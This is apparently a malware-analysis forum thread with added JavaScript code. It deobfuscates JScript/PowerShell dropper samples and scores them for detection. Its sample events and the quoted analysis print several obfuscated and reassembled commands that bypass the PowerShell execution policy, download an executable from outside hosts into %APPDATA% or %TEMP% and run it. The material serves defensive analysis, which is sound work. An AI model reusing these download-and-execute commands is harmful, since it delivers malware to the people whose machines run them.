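  return events.map(analyzeEvent)
    .filter(r => r.severity !== 'none')
    .sort((a, b) => RANK[b.severity] - RANK[a.severity]);
}

// Constructed events (assumed Sysmon-like field names).
const sampleEvents = [
  { pid: 4120, parentImage: 'C:\\Windows\\System32\\wscript.exe', image: 'C:\\Windows\\System32\\cmd.exe',
    commandLine: String.raw`cmd.eXe /c PO^we^r^s^h^e^LL.e^x^e ^-execUti^oNP^O^lIcy ^b^Y^P^a^ss -^n^o^p^ROF^ile^ -^w^In^dOwst^y^Le ^hi^d^d^en (New^-^Ob^Ject ^syste^m.n^et^.^we^b^c^l^i^ent).^dOwn^load^Fi^Le('http ://www .aleqopena.top/user.php?f=1.dat','%appdata%\exe');staR^t-pRO^cess ^%apPdata%\exe` },
  { pid: 5208, parentImage: 'C:\\Windows\\explorer.exe', image: 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe',
    commandLine: 'powershell.exe -NoProfile -Command Get-Process' },
  { pid: 6644, parentImage: 'C:\\Windows\\System32\\wscript.exe', image: 'C:\\Windows\\System32\\cmd.exe',
    commandLine: String.raw`cmd.exe /c "powershell $a='^Set-Exe';$b='^cutionP';$c='^olicy B';$d='^ypass'; Invoke-Expression ($a+$b+$c+$d)"` },
];

console.log(JSON.stringify(triage(sampleEvents), null, 2));
```

The first event scores high on six indicators once the carets are gone; the benign launch stays low. The third event only scores low even though it is the same dropper family, because on the command line "Set-ExecutionPolicy Bypass" still exists as separate fragments. That gap is why command-line matching should be paired with PowerShell script block logging (event 4104), which records the script after Invoke-Expression has reassembled it, or with static reassembly of the fragments.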

 

DardiM

From https://malwaretips.com/threads/6-3-2017-20.69284/
Thanks to silversurfer

https://www.reverse.it/sample/614f1...559ca1216f6dd45ad9af4fd2bc7?environmentId=100

Difference from the previous samples:

It is very easy to find where the important part is:
=> a lot of code in these "case"
=> "run"

case undefined:
munmizfaf[[Number(-43.2386), "run", Number(-46.2881), Number(-48.4848), Number(-39.1672), Number(-49.3387)][1]]]
(
[Number(-49.3070), Number(-37.1203), Number(-50.2351), Number(-43.2775), Number(-48.1748), Number(-50.1811), Number(-40.1221), ekvikja(1, [Number(-48.1759), "cmd.exe", Number(-50.3582), Number(-36.4063), Number(-
...
...
...
Number(-35.3626), Number(-44.3878)][7]
, owwyger
);


munmizfaf:

=> var munmizfaf = new ActiveXObject(biswoki);

=> biswoki:

var biswoki = 'WScript.Sh' + 'ell';

=> biswoki = "WScript.Shell"

=> var munmizfaf = new ActiveXObject("WScript.Shell");

Not too difficult to understand:

Old version of the command_line:
Code:
var ovsut = "cmd.exe /c \"po" + "we" + "rs" + "he" + "ll  $eposj='^le(''ht';$qekos='^ope   Pr';$bzeda='^qfy.ex';$iwjumv='^ss    -Sc';$akisi='^ackand';$cedwaq='^.233.2';$iwadxa='^Set-Ex';$ketumq='^=($env';$casew='^ew-Obj';$bilat='^ocess;';$bpoqoj='^et.Web';$nadug='^e'');(N';$lmyde='^ss $pa';$awdipki='^th';$jysec='^client';$ohmywy='^02.181';$elopmy='^trace.';$sova='^path);';$yhap='^ect Sy';$tcapwi='^:temp+';$okxuwl='^42/.tr';$eraqy='^exe'',$';$opugy='^).Down';$dsawip='^    Start';$rulih='^nPolic';$ihcavo='^ecutio';$bikzo='^tp://2';$famyxs='^ $path';$odad='^''\afwa';$uloju='^y     Bypa';$ofafj='^stem.N';$tovju='^-Proce';$ycigbi='^loadFi'; Invoke-Expression ($iwadxa+$ihcavo+$rulih+$uloju+$iwjumv+$qekos+$bilat+$famyxs+$ketumq+$tcapwi+$odad+$bzeda+$nadug+$casew+$yhap+$ofafj+$bpoqoj+$jysec+$opugy+$ycigbi+$eposj+$bikzo+$ohmywy+$cedwaq+$okxuwl+$akisi+$elopmy+$eraqy+$sova+$dsawip+$tovju+$lmyde+$awdipki);\"";

Now: they tried to obfuscate a bit more:
=> Arrays of useless and useful parts

Example:

[Number(-43.2386), "run", Number(-46.2881), Number(-48.4848), Number(-39.1672), Number(-49.3387)][1]

=> "run"
shell.run( command_line , 0);
An easy method to get the real parts inside:

=> just keep the strings :D

You will obtain the code below: temp vars are created with the parts, and at the end, all parts are put in the right order and the final string is run by Invoke-Expression

"cmd.exe /c \"powershell $nubli='^/point.';

$bopy='^($env:t';
$awomhe='^gkp'',$p';
$ycahga='^wnloadF';
$ibtizw='^.Webcli';
$oman='^ile(''ht';
$yhajdo='^path';
$lahy='^ent).Do';
$dusi='^ $path=';
$hnezzi='^olicy B';
$bzofhe='^cutionP';
$nuwes='^tart-Pr';
$ofyhq='^emp+''\\n';
$apot='^lpin.no';
$bada='^ath); S';
$zobpisq='^Scope P';
$kewwu='^ect Sys';
$inquzy='^appinm.';
$epem='^ocess $';
$ovivxe='^exe'');(';
$whedoxn='^tem.Net';
$vxylxi='^Set-Exe';
$itnuvy='^udail-a';
$ebep='^ypass -';
$virpyrg='^tp://sa';
$qaxxuhg='^rocess;';
$siwgi='^New-Obj';
Invoke-Expression ($vxylxi+$bzofhe+$hnezzi+$ebep+$zobpisq+$qaxxuhg+$dusi+$bopy+$ofyhq+$inquzy+$ovivxe+$siwgi+$kewwu+$whedoxn+$ibtizw+$lahy+$ycahga+$oman+$virpyrg+$itnuvy+$apot+$nubli+$awomhe+$bada+$nuwes+$epem+$yhajdo);\\\""

In the right order:

Set-ExecutionPolicy Bypass -Scope Process;
$path=($env:temp+''\\nappinm.exe'');
(New-Object System.Net.Webclient).DownloadFile(''hXXp://saudail-alpin.no/point.gkp'',$path);
Start-Process $path;


=> %TEMP%\nappinm.exe: payload

The URL doesn't work anymore.
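Both the info.js post above and this one end with the same puzzle: a set of $name='^part' assignments and an Invoke-Expression over their concatenation. As an added example (not the thread's own code), the script below does that reassembly statically, so the final PowerShell can be read without letting cmd.exe or powershell.exe run anything. The puzzle text is this sample's PowerShell body as it exists once the JS string literal has been evaluated (copied from the post, with the ^ and the doubled '' still in place; String.raw keeps the backslash of '\n' literal, as JS "\\n" did). The carets are cmd.exe escape characters, stripped by cmd before PowerShell sees the line, and '' is PowerShell's escape for one quote inside a single-quoted string, so both are undone at the end. The indicator extraction and defang helpers are my additions.

```javascript
// Added example, not the thread's code: static reassembly of the
// "$name='^part'; ... Invoke-Expression ($a+$b+...)" puzzle.

// This sample's PowerShell body after JS string evaluation (from the post).
const puzzle = String.raw`$nubli='^/point.';
$bopy='^($env:t';
$awomhe='^gkp'',$p';
$ycahga='^wnloadF';
$ibtizw='^.Webcli';
$oman='^ile(''ht';
$yhajdo='^path';
$lahy='^ent).Do';
$dusi='^ $path=';
$hnezzi='^olicy B';
$bzofhe='^cutionP';
$nuwes='^tart-Pr';
$ofyhq='^emp+''\n';
$apot='^lpin.no';
$bada='^ath); S';
$zobpisq='^Scope P';
$kewwu='^ect Sys';
$inquzy='^appinm.';
$epem='^ocess $';
$ovivxe='^exe'');(';
$whedoxn='^tem.Net';
$vxylxi='^Set-Exe';
$itnuvy='^udail-a';
$ebep='^ypass -';
$virpyrg='^tp://sa';
$qaxxuhg='^rocess;';
$siwgi='^New-Obj';
Invoke-Expression ($vxylxi+$bzofhe+$hnezzi+$ebep+$zobpisq+$qaxxuhg+$dusi+$bopy+$ofyhq+$inquzy+$ovivxe+$siwgi+$kewwu+$whedoxn+$ibtizw+$lahy+$ycahga+$oman+$virpyrg+$itnuvy+$apot+$nubli+$awomhe+$bada+$nuwes+$epem+$yhajdo);`;

// Collect every $name='value' assignment. PowerShell doubles a single quote
// inside a single-quoted string, so the value pattern accepts '' as one char.
function collectParts(script) {
  const parts = {};
  const re = /\$(\w+)\s*=\s*'((?:[^']|'')*)'/g;
  let m;
  while ((m = re.exec(script)) !== null) parts[m[1]] = m[2];
  return parts;
}

// Read the concatenation order from the Invoke-Expression argument list.
function concatOrder(script) {
  const m = /Invoke-Expression\s*\(\s*([^)]+?)\s*\)/i.exec(script);
  if (!m) throw new Error('no Invoke-Expression(...) found');
  return m[1].split('+').map(t => t.trim().replace(/^\$/, ''));
}

// Join the parts in that order, then undo the cmd.exe ^ escapes and the
// PowerShell '' quote escape, giving the script Invoke-Expression would run.
function reassemble(script) {
  const parts = collectParts(script);
  const joined = concatOrder(script).map(name => {
    if (!(name in parts)) throw new Error('missing part: $' + name);
    return parts[name];
  }).join('');
  return joined.replace(/\^/g, '').replace(/''/g, "'");
}

// Pull the two indicators an analyst reports: download URL and drop path.
// The drop path is rendered as %VAR%<file> from the "$env:var+'file'" idiom.
function extractIndicators(script) {
  const urlMatch = /https?:\/\/[^\s'")]+/i.exec(script);
  const drop = /\$env:(\w+)\s*\+\s*'([^']+)'/i.exec(script);
  return {
    url: urlMatch ? urlMatch[0] : null,
    dropPath: drop ? '%' + drop[1].toUpperCase() + '%' + drop[2] : null,
  };
}

// Defang URLs for reports so the indicator cannot be clicked or auto-fetched.
function defang(text) {
  return text.replace(/https?:\/\/[^\s'")]+/gi,
    url => url.replace(/^http/i, 'hxxp').replace(/\./g, '[.]'));
}

const script = reassemble(puzzle);
console.log(defang(script));
console.log(JSON.stringify({ order: concatOrder(puzzle).length, ...extractIndicators(defang(script)) }));
```

For the info.js sample the same functions apply to its PowerShell body once the JS string has been evaluated; the '' in that sample are handled identically, and the only thing to watch is that the JS literal's own escapes (such as \\n) have been resolved before the text is fed in.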
 
